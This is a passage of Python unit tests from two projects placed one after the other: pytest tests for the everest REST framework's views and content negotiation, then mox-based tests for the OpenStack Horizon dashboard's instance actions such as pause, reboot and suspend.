        mb = coll.create_member(ent)
        assert mb.__name__ == '0'
        req_body = b'"number"\n2\n'
        res = msg_view_app_creator.patch("%s/0" % self.path,
                                         params=req_body,
                                         content_type=CsvMime.mime_type_string,
                                         status=200)
        assert res is not None
class TestPredicatedView(object):
    # Tests a GET collection view guarded by the accept_csv_only predicate.
    package_name = 'everest.tests.complete_app'
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')
    app_name = 'complete_app'
    path = '/my-entities'
    def test_csv_only(self, pred_view_app_creator): #pylint:disable=W0621
        # Without accept header, we get a 404.
        pred_view_app_creator.get(self.path, status=404)
        # With a CSV accept header the predicate matches and the view fires.
        pred_view_app_creator.get(self.path,
                                  headers=dict(accept=CSV_MIME), status=200)
class _TestConfiguredViews(object):
    """Shared tests for ZCML-configured views (classic and new style)."""
    views_config_file_name = None
    package_name = 'everest.tests.simple_app'
    ini_file_path = resource_filename('everest.tests.simple_app',
                                      'simple_app_views.ini')
    app_name = 'simple_app'
    path = '/foos'
    # (suffix, expected body fragment, match-at-end flag) triples shared by
    # the parametrized suffix tests below.
    params = ('suffix,expected,end',
              [('csv', b'"id"', False),
               ('json', b'[{"id": 0', False),
               ('xml', b'</foos>', True)])
    # NOTE: 'params' is usable below because the outermost iterable of a
    # comprehension is evaluated eagerly in the class body's scope; pylint
    # can not see this, hence the E0602 suppressions.
    @pytest.mark.usefixtures('trv_view_member')
    @pytest.mark.parametrize('template,' + params[0],
                             [('%s.%s',) + args
                              for args in params[1]] + # pylint: disable=E0602
                             [('%s/@@%s',) + args
                              for args in params[1]]) # pylint: disable=E0602
    def test_with_suffix(self, trv_app_creator, template,
                         suffix, expected, end):
        # Exercises both '.suffix' and '@@name' traversal forms.
        res = trv_app_creator.get(template % (self.path, suffix), status=200)
        if not end:
            assert res.body[:len(expected)] == expected
        else:
            assert res.body.strip()[-len(expected):] == expected
        # Fail for non-existing collection.
        trv_app_creator.get('/bars.csv', status=404)
    def test_custom_view_with_interface_raises_error(self, app_creator):
        # Custom views must be registered for a class, not an interface.
        with pytest.raises(ValueError):
            app_creator.config.add_resource_view(IFoo,
                                                 view=lambda context,
                                                             request: None)
class TestClassicStyleConfiguredViews(_TestConfiguredViews):
    # Classic-style view configuration: no default view is registered.
    config_file_name = 'everest.tests.simple_app:configure_views_classic.zcml'
    def test_default(self, app_creator):
        # No default - triggers a 404.
        app_creator.get(self.path, status=404)
class TestNewStyleConfiguredViews(_TestConfiguredViews):
    """New-style configured views; a default content type is available."""
    config_file_name = 'everest.tests.simple_app:configure_views.zcml'
    def test_default(self, app_creator):
        # New style views return the default_content_type.
        res = app_creator.get(self.path, status=200)
        assert res.body.startswith(b'<?xml')
    def test_custom_view(self, app_creator):
        # A custom callable registered under a view name is served verbatim.
        TXT = b'my custom response body'
        def custom_view(context, request): # context unused pylint: disable=W0613
            request.response.body = TXT
            return request.response
        app_creator.config.add_collection_view(IFoo,
                                               view=custom_view, name='custom')
        res = app_creator.get('/foos/@@custom')
        assert res.body == TXT
    def test_invalid_accept_header(self, app_creator):
        # Unsupported MIME type in accept header -> 406 Not Acceptable.
        app_creator.get(self.path,
                        headers=dict(accept='application/foobar'),
                        status=406)
    def test_star_star_accept_header(self, app_creator):
        app_creator.get(self.path,
                        headers=dict(accept='*/*'),
                        status=200)
    def test_invalid_request_content_type(self, app_creator):
        # Unsupported request content type -> 415 Unsupported Media Type.
        app_creator.config.add_collection_view(IFoo,
                                               request_method=
                                                    RequestMethods.POST)
        app_creator.post(self.path,
                         params='foobar',
                         content_type='application/foobar',
                         status=415)
    @pytest.mark.usefixtures('trv_view_member')
    def test_fake_put_view(self, app_creator):
        # A POST with X-HTTP-Method-Override is dispatched as a PUT.
        app_creator.config.add_member_view(IFoo,
                                           request_method=
                                                RequestMethods.FAKE_PUT)
        req_body = '"id"\n0'
        app_creator.post("%s/0" % self.path,
                         params=req_body,
                         content_type=CsvMime.mime_type_string,
                         headers={'X-HTTP-Method-Override' :
                                  RequestMethods.PUT},
                         status=200)
    @pytest.mark.usefixtures('trv_view_member')
    def test_fake_patch_view(self, app_creator):
        # A POST with X-HTTP-Method-Override is dispatched as a PATCH.
        app_creator.config.add_member_view(IFoo,
                                           request_method=
                                                RequestMethods.FAKE_PATCH)
        req_body = '"id"\n0'
        app_creator.post("%s/0" % self.path,
                         params=req_body,
                         content_type=CsvMime.mime_type_string,
                         headers={'X-HTTP-Method-Override' :
                                  RequestMethods.PATCH},
                         status=200)
    @pytest.mark.usefixtures('trv_view_member')
    def test_fake_delete_view(self, app_creator):
        # A POST with X-HTTP-Method-Override is dispatched as a DELETE.
        app_creator.config.add_member_view(IFoo,
                                           request_method=
                                                RequestMethods.FAKE_DELETE)
        app_creator.post("%s/0" % self.path,
                         headers=
                         {'X-HTTP-Method-Override' : RequestMethods.DELETE},
                         status=200)
    def test_add_collection_view_with_put_fails(self, app_creator):
        # PUT can not be auto-detected as a collection view method.
        with pytest.raises(ValueError) as cm:
            app_creator.config.add_collection_view(IFoo,
                                                   request_method=
                                                        RequestMethods.PUT)
        assert str(cm.value).startswith('Autodetection')
    def test_add_member_view_with_post_fails(self, app_creator):
        # POST can not be auto-detected as a member view method.
        with pytest.raises(ValueError) as cm:
            app_creator.config.add_member_view(IFoo,
                                               request_method=
                                                    RequestMethods.POST)
        assert str(cm.value).startswith('Autodetection')
class TestGetCollectionView(object):
    """Direct (non-webtest) invocation of GetCollectionView with a request."""
    package_name = 'everest.tests.simple_app'
    config_file_name = 'configure.zcml'
    ini_file_path = resource_filename('everest.tests.simple_app',
                                      'simple_app_views.ini')
    def test_get_collection_view_with_size(self, class_ini, app_creator):
        coll = get_root_collection(IFoo)
        path_url = 'http://0.0.0.0:6543/foos/'
        req = DummyRequest(application_url=class_ini.app_url,
                           host_url=class_ini.app_url,
                           path_url=path_url,
                           url=path_url + '?size=10',
                           params=dict(size=10),
                           registry=app_creator.config.registry,
                           accept=['*/*'])
        # Stubbed out on the dummy request; presumably required by the
        # view's response handling - TODO confirm against GetCollectionView.
        req.get_response = lambda exc: None
        view = GetCollectionView(coll, req)
        res = view()
        assert res is not None
        # The requested size is applied to the context slice.
        assert view.context.slice.start == 0
        assert view.context.slice.stop == 10
        # Try again with size exceeding the allowed maximum limit (page size).
        req.params = dict(size=10000)
        req.url = path_url + '?size=10000'
        res = view()
        assert res is not None
        # The slice is capped at the collection's maximum limit.
        assert view.context.slice.start == 0
        assert view.context.slice.stop == FooCollection.max_limit
class TestStaticView(object):
    """Serving static files through the registered 'public' view."""
    package_name = 'everest.tests.complete_app'
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')
    app_name = 'complete_app'
    def test_access_public_dir(self, static_vw_app_creator):
        # The fixture points 'public_dir' at the test data directory.
        static_vw_app_creator.get('/public/myentity-collection.csv', status=200)
class TestExceptionView(object):
    """Views raising unhandled exceptions must produce a 500 response."""
    package_name = 'everest.tests.complete_app'
    config_file_name = 'everest.tests.complete_app:configure_no_rdb.zcml'
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')
    app_name = 'complete_app'
    path = '/my-entities'
    def test_put_member_raises_error(self, exc_vw_app_creator):
        coll = get_root_collection(IMyEntity)
        ent = MyEntity(id=0)
        coll.create_member(ent)
        # The registered PUT view (ExceptionPutMemberView) raises -> 500.
        exc_vw_app_creator.put("%s/0" % self.path,
                               params='dummy body',
                               status=500)
    def test_post_collection_raises_error(self, exc_vw_app_creator):
        req_body = '"id","text","number"\n0,"abc",2\n'
        # The registered POST view (ExceptionPostCollectionView) raises -> 500.
        exc_vw_app_creator.post("%s" % self.path,
                                params=req_body,
                                content_type=CsvMime.mime_type_string,
                                status=500)
class _TestWarningViewBase(object):
    """Tests for views emitting user messages (warnings) via 307 redirects."""
    package_name = 'everest.tests.simple_app'
    ini_file_path = resource_filename('everest.tests.simple_app',
                                      'simple_app_views.ini')
    app_name = 'simple_app'
    path = '/foos'
    config_file_name = None

    def test_post_collection_empty_body(self, wrn_vw_app_creator):
        res = wrn_vw_app_creator.post(self.path, params='',
                                      status=400)
        assert res is not None

    @pytest.mark.parametrize('path', [path, '/foos?q=id=0'])
    def test_post_collection_warning_exception(self, wrn_vw_app_creator, path):
        # First POST - get back a 307.
        res1 = wrn_vw_app_creator.post(path, params='foo name',
                                       status=307)
        body_text = native_(res1.body.rstrip(), encoding='utf-8')
        assert body_text.endswith(UserMessagePostCollectionView.message)
        assert res1.body.startswith(b'307 Temporary Redirect')
        # Second POST to redirection location - get back a 201.
        resubmit_location1 = res1.headers['Location']
        res2 = wrn_vw_app_creator.post(resubmit_location1,
                                       params='foo name',
                                       status=201)
        assert res2 is not None
        # Third POST to same redirection location with different warning
        # message triggers a 307 again.
        old_msg = UserMessagePostCollectionView.message
        UserMessagePostCollectionView.message = old_msg[::-1]
        try:
            res3 = wrn_vw_app_creator.post(resubmit_location1,
                                           params='foo name',
                                           status=307)
            assert res3.body.startswith(b'307 Temporary Redirect')
            # Fourth POST to new redirection location - get back a 409 (since
            # the second POST from above went through).
            resubmit_location2 = res3.headers['Location']
            res4 = wrn_vw_app_creator.post(resubmit_location2,
                                           params='foo name',
                                           status=409)
            assert res4 is not None
        finally:
            UserMessagePostCollectionView.message = old_msg

    def test_put_member_warning_exception(self, wrn_vw_app_creator):
        root = get_service()
        # Need to start the service manually - no request root has been set
        # yet.
        root.start()
        coll = root['foos']
        mb = FooMember(FooEntity(id=0))
        coll.add(mb)
        transaction.commit()
        path = '/'.join((self.path, '0'))
        # First PUT - get back a 307.
        res1 = wrn_vw_app_creator.put(path,
                                      params='foo name',
                                      status=307)
        assert res1.body.startswith(b'307 Temporary Redirect')
        # Second PUT to redirection location - get back a 200.
        resubmit_location1 = res1.headers['Location']
        res2 = wrn_vw_app_creator.put(resubmit_location1, params='foo name',
                                      status=200)
        assert res2 is not None
class TestWarningViewMemory(_TestWarningViewBase):
    # Warning view tests against the memory backend.
    config_file_name = \
        'everest.tests.simple_app:configure_messaging_memory.zcml'
@pytest.mark.usefixtures('rdb')
class TestWarningViewRdb(_TestWarningViewBase):
    # Warning view tests against the RDB backend.
    config_file_name = 'everest.tests.simple_app:configure_messaging_rdb.zcml'
class TestWarningWithExceptionView(object):
    """A view raising while messaging is configured must still yield a 500."""
    package_name = 'everest.tests.complete_app'
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')
    app_name = 'complete_app'
    path = '/my-entities'
    def test_post_collection_raises_error(self, wrn_with_exc_vw_app_creator):
        req_body = '"id","text","number"\n0,"abc",2\n'
        wrn_with_exc_vw_app_creator.post("%s" % self.path,
                                         params=req_body,
                                         content_type=
                                            CsvMime.mime_type_string,
                                         status=500)
# pylint: enable=W0621
# (stray '|' separator artifact removed - it was a syntax error between files)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from django.core.urlresolvers import reverse # noqa
from django import http
from django.utils.datastructures import SortedDict # noqa
from django.utils.http import urlencode # noqa
from mox import IgnoreArg # noqa
from mox import IsA # noqa
from horizon.workflows import views
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.project.instances import tables
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances import workflows
# URL of the project instances index (landing) page.
INDEX_URL = reverse('horizon:project:instances:index')
# Form-field prefix for security-group entries in the update-instance
# workflow; presumably suffixed per security group - confirm in the workflow.
SEC_GROUP_ROLE_PREFIX = \
    workflows.update_instance.INSTANCE_SEC_GROUP_SLUG + "_role_"
class InstanceTests(test.TestCase):
    @test.create_stubs({api.nova: ('flavor_list',
                                   'server_list',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_index(self):
        """Index page renders and lists all servers from server_list."""
        # Record the mox expectations; the view's calls are verified on
        # replay, so the recording order below matters.
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res,
                                'project/instances/index.html')
        instances = res.context['instances_table'].data
        self.assertItemsEqual(instances, self.servers.list())
    @test.create_stubs({api.nova: ('server_list',
                                   'tenant_absolute_limits',)})
    def test_index_server_list_exception(self):
        """A failing server_list yields an empty table and one error message."""
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndRaise(self.exceptions.nova)
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/instances/index.html')
        self.assertEqual(len(res.context['instances_table'].data), 0)
        self.assertMessageCount(res, error=1)
    @test.create_stubs({api.nova: ('flavor_list',
                                   'server_list',
                                   'flavor_get',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_index_flavor_list_exception(self):
        """If flavor_list fails, flavors are fetched per server via flavor_get."""
        servers = self.servers.list()
        flavors = self.flavors.list()
        full_flavors = SortedDict([(f.id, f) for f in flavors])
        search_opts = {'marker': None, 'paginate': True}
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([servers, False])
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndRaise(self.exceptions.nova)
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        # One fallback flavor_get expectation per server.
        for server in servers:
            api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
                AndReturn(full_flavors[server.flavor["id"]])
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/instances/index.html')
        instances = res.context['instances_table'].data
        self.assertItemsEqual(instances, self.servers.list())
    @test.create_stubs({api.nova: ('flavor_list',
                                   'server_list',
                                   'flavor_get',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_index_flavor_get_exception(self):
        """Per-server flavor_get failures still render, one error per server."""
        servers = self.servers.list()
        flavors = self.flavors.list()
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        # UUIDs generated using indexes are unlikely to match
        # any of existing flavor ids and are guaranteed to be deterministic.
        for i, server in enumerate(servers):
            server.flavor['id'] = str(uuid.UUID(int=i))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([servers, False])
        api.nova.flavor_list(IsA(http.HttpRequest)).AndReturn(flavors)
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        # Every per-server flavor lookup fails.
        for server in servers:
            api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
                AndRaise(self.exceptions.nova)
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        instances = res.context['instances_table'].data
        self.assertTemplateUsed(res, 'project/instances/index.html')
        self.assertMessageCount(res, error=len(servers))
        self.assertItemsEqual(instances, self.servers.list())
    @test.create_stubs({api.nova: ('flavor_list',
                                   'server_list',
                                   'tenant_absolute_limits',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',),
                        api.network:
                            ('floating_ip_simple_associate_supported',),
                        })
    def test_index_with_instance_booted_from_volume(self):
        """A volume-backed instance (no image) renders its '(not found)' name."""
        volume_server = self.servers.first()
        # Volume-booted instances have an empty image attribute.
        volume_server.image = ""
        volume_server.image_name = "(not found)"
        servers = self.servers.list()
        servers[0] = volume_server
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([servers, False])
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
            .MultipleTimes().AndReturn(self.limits['absolute'])
        api.network.floating_ip_simple_associate_supported(
            IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
        self.mox.ReplayAll()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'project/instances/index.html')
        instances = res.context['instances_table'].data
        self.assertEqual(len(instances), len(servers))
        self.assertContains(res, "(not found)")
    @test.create_stubs({api.nova: ('server_list',
                                   'flavor_list',
                                   'server_delete',),
                        api.glance: ('image_list_detailed',)})
    def test_terminate_instance(self):
        """The terminate row action calls server_delete and redirects to index."""
        server = self.servers.first()
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        api.nova.server_delete(IsA(http.HttpRequest), server.id)
        self.mox.ReplayAll()
        formData = {'action': 'instances__terminate__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_list',
                                   'flavor_list',
                                   'server_delete',),
                        api.glance: ('image_list_detailed',)})
    def test_terminate_instance_exception(self):
        """A failing server_delete still redirects back to the index page."""
        server = self.servers.first()
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        api.nova.server_delete(IsA(http.HttpRequest), server.id) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__terminate__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_pause',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_pause_instance(self):
        """The pause row action calls server_pause and redirects to index."""
        server = self.servers.first()
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_pause(IsA(http.HttpRequest), server.id)
        self.mox.ReplayAll()
        formData = {'action': 'instances__pause__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_pause',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_pause_instance_exception(self):
        """A failing server_pause still redirects back to the index page."""
        server = self.servers.first()
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_pause(IsA(http.HttpRequest), server.id) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__pause__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_unpause',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_unpause_instance(self):
        """Posting the pause action for a PAUSED instance calls
        server_unpause.

        NOTE(review): the posted action name is still 'pause' — presumably
        the row action toggles based on instance status; confirm against
        the table actions module.
        """
        server = self.servers.first()
        server.status = "PAUSED"
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_unpause(IsA(http.HttpRequest), server.id)
        self.mox.ReplayAll()
        formData = {'action': 'instances__pause__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_unpause',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_unpause_instance_exception(self):
        """A nova error raised by server_unpause still redirects back to
        the instances index.
        """
        server = self.servers.first()
        server.status = "PAUSED"
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_unpause(IsA(http.HttpRequest), server.id) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__pause__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_reboot',
                                   'server_list',
                                   'flavor_list',),
                        api.glance: ('image_list_detailed',)})
    def test_reboot_instance(self):
        """The reboot row action issues a hard reboot (soft_reboot=False)."""
        server = self.servers.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_reboot(IsA(http.HttpRequest), server.id,
                               soft_reboot=False)
        self.mox.ReplayAll()
        formData = {'action': 'instances__reboot__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_reboot',
                                   'server_list',
                                   'flavor_list',),
                        api.glance: ('image_list_detailed',)})
    def test_reboot_instance_exception(self):
        """A nova error raised by server_reboot still redirects back to
        the instances index.
        """
        server = self.servers.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_reboot(IsA(http.HttpRequest), server.id,
                               soft_reboot=False) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__reboot__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_reboot',
                                   'server_list',
                                   'flavor_list',),
                        api.glance: ('image_list_detailed',)})
    def test_soft_reboot_instance(self):
        """The soft_reboot row action calls server_reboot with
        soft_reboot=True.
        """
        server = self.servers.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_reboot(IsA(http.HttpRequest), server.id,
                               soft_reboot=True)
        self.mox.ReplayAll()
        formData = {'action': 'instances__soft_reboot__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_suspend',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_suspend_instance(self):
        """Posting the suspend row action invokes nova server_suspend."""
        server = self.servers.first()
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        # The stub expects the id coerced to unicode (Python 2 era code),
        # matching how the action handler passes it through.
        api.nova.server_suspend(IsA(http.HttpRequest), unicode(server.id))
        self.mox.ReplayAll()
        formData = {'action': 'instances__suspend__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_suspend',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_suspend_instance_exception(self):
        """A nova error raised by server_suspend still redirects back to
        the instances index.
        """
        server = self.servers.first()
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_suspend(IsA(http.HttpRequest), unicode(server.id)) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__suspend__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_resume',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
    def test_resume_instance(self):
        """Posting the suspend action for a SUSPENDED instance calls
        server_resume.

        NOTE(review): the posted action name is still 'suspend' —
        presumably the row action toggles based on instance status;
        confirm against the table actions module.
        """
        server = self.servers.first()
        server.status = "SUSPENDED"
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_resume(IsA(http.HttpRequest), unicode(server.id))
        self.mox.ReplayAll()
        formData = {'action': 'instances__suspend__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_resume',
                                   'server_list',
                                   'flavor_list',
                                   'extension_supported',),
                        api.glance: ('image_list_detailed',)})
